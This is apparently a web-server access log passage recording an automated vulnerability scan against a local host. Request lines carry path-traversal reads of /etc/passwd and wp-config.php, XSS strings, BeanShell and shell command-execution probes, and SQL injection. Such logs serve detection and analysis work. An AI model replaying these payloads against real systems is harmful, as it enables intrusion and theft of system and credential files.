(Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.save HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktop/container/landing.jsp?locale=en_US HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /file=C:%5CWindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/group/list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/common/login/webLogin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/debug/default/view HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /heapdump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /code?dag_id=example_passing_params_via_test_command HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/oauth2/..;/ccversion/Version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gitlab/build_now%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.swp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /profile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /deltaweb/hmi_login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"{\x22name\x22:\x2229KD1udImfzyQNFn0YH7J93XDx1\x22,\x22basepath\x22:\x22\x22,\x22group_id\x22:\x22{{group_id}}\x22,\x22icon\x22:\x22code-o\x22,\x22color\x22:\x22cyan\x22,\x22project_type\x22:\x22private\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/project/add HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sapi/debug/default/view HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/heapdump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpunit.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /darkstat/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"bsh.script=exec(\x22id\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /maint/index.php?packages HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"127.0.0.1/maint/index.php?packages", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jasperserver/login.html?error=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/profile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kylin/api/admin/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /my.ppk HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configprops HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apc/apc.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/systemcall.php?command=cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"bsh.script=exec(\x22ipconfig\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"127.0.0.1/maint/index.php?packages", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/page_start.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jasperserver-pro/login.html?error=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sfiler/Login.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"appno= 1 union SELECT 98989*443131,1&editor=cn&site=web","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /alps/profile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /modules/babel/redirect.php?newurl=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/configprops HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apc.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:35 +0000","request_body":"--29KD1yM729iR3WWvOEHOnPpCvZC\x0D\x0AContent-Disposition: form-data; name=\x2229KD1uOpyVwbYHzxfHKuAYyHquT\x22; filename=\x2229KD1vCg07jDvLhLKSRuBNhe8yJ.xml\x22\x0D\x0AContent-Type: application/xml\x0D\x0A\x0D\x0A\x0D\x0A \x0D\x0A \x0D\x0A ALttP\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 12345\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A--29KD1yM729iR3WWvOEHOnPpCvZC\x0D\x0AContent-Disposition: form-data; name=\x2229KD1yG9Z05duE4iCDPauEb3WBy\x22; 